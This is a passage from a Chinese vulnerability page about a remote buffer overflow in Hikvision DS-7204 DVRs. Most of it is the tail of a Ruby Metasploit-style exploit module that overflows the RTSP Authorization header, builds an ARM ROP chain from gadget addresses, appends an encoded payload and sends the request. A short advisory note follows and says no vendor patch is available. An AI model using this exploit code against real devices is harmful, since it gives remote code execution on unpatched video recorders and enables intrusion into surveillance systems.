7204远程缓冲区溢出漏洞(CVE(2)

request =  "PLAY rtsp://#{rhost}/ RTSP/1.0\r\n"
    request << "CSeq: 7\r\n"
    request << "Authorization: Basic "
    request << rand_text_alpha(0x280 + 34)
    request << [target["g_adjustesp"]].pack("V")[0..2]
    request << "\r\n\r\n"
    request << rand_text_alpha(19)

# now append the ropchain
    request << device_rop
    request << rand_text_alpha(8)
    request << payload.encoded

connect
    sock.put(request)
    disconnect
  end

# These devices are armle, run version 1.3.1 of libupnp, have random stacks, but no PIE on libc
  def target_ds7204_1
    # Create a fixed-size buffer for the rop chain
    ropbuf = rand_text_alpha(24)

# CHAIN = [
    #  0, #R4 pop adjustsp
    #  0, #R5 pop adjustsp
    #  GADGET_BLXR3_POP, #R6 pop adjustsp
    #  GADGET_POPR3,
    #  0, #R3 pop
    #  GADGET_R3FROMSP,
    # ]

ropbuf[8,4] = [target["g_blxr3_pop"]].pack("V")
    ropbuf[12,4] = [target["g_popr3"]].pack("V")
    ropbuf[20,4] = [target["g_r3fromsp"]].pack("V")

return ropbuf
  end

# Generate a buffer that provides a starting point for exploit development
  def target_debug
    Rex::Text.pattern_create(2000)
  end

def rhost
    datastore['RHOST']
  end

def rport
    datastore['RPORT']
  end

end

建议:
厂商补丁:

hikvision
 ---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:http://www.heiqu.com/19fc11cdaeb651ec39ce6d882ffe11c4.html